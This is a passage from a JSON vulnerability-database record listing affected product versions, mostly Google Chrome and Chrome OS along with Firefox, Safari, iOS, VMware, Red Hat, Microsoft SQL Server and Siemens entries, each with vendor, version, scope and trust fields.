      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.382.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.290.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.33"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.386.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1056.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1670.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.839.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1277.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "18.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.38"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.764.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.616.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.66"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.82"
      },
      {
        "model": "enterprise linux for power big endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.22"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.45"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "45.0.2454"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.564.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1046"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.50"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.3.1"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.1.1"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.5"
      },
      {
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201420"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1081.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.868.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.19"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.126.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.220"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.42"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.397.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.70"
      },
      {
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.99"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.50"
      },
      {
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201420"
      },
      {
        "model": "ipad air",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.491.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1054.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.535.1"
      },
      {
        "model": "enterprise linux server year extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-47.2"
      },
      {
        "model": "enterprise linux for scientific computing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1289.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.825.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.814.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.600.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.566.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.3"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.132"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.137"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "50.0.2661.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.877.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.860.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.475.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1070.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.958.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.1.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.94"
      },
      {
        "model": "simatic ipc847c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.415.1"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.10"
      },
      {
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.108"
      },
      {
        "model": "simatic itp1000",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "v23.01.03"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1020.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.614.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.57"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.7"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.344.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.235"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.156.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.715.0"
      },
      {
        "model": "ipod touch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "model": "kiestra inoqula standalone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.55"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.505.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1063.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.286.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.3.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.723.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.134"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.725.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.92"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "15.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.224"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.672.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.358.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.151"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.754.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.107"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.58"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31.6"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.5"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1007"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1659.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.783.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "16.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1047"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1052"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.78"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.51"
      },
      {
        "model": "simatic ipc277e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1690.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.308"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.820.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1044.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.109"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.343"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.432.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.731.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.249.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.560.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.819.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.324.0"
      },
      {
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1048"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.125"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1032.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
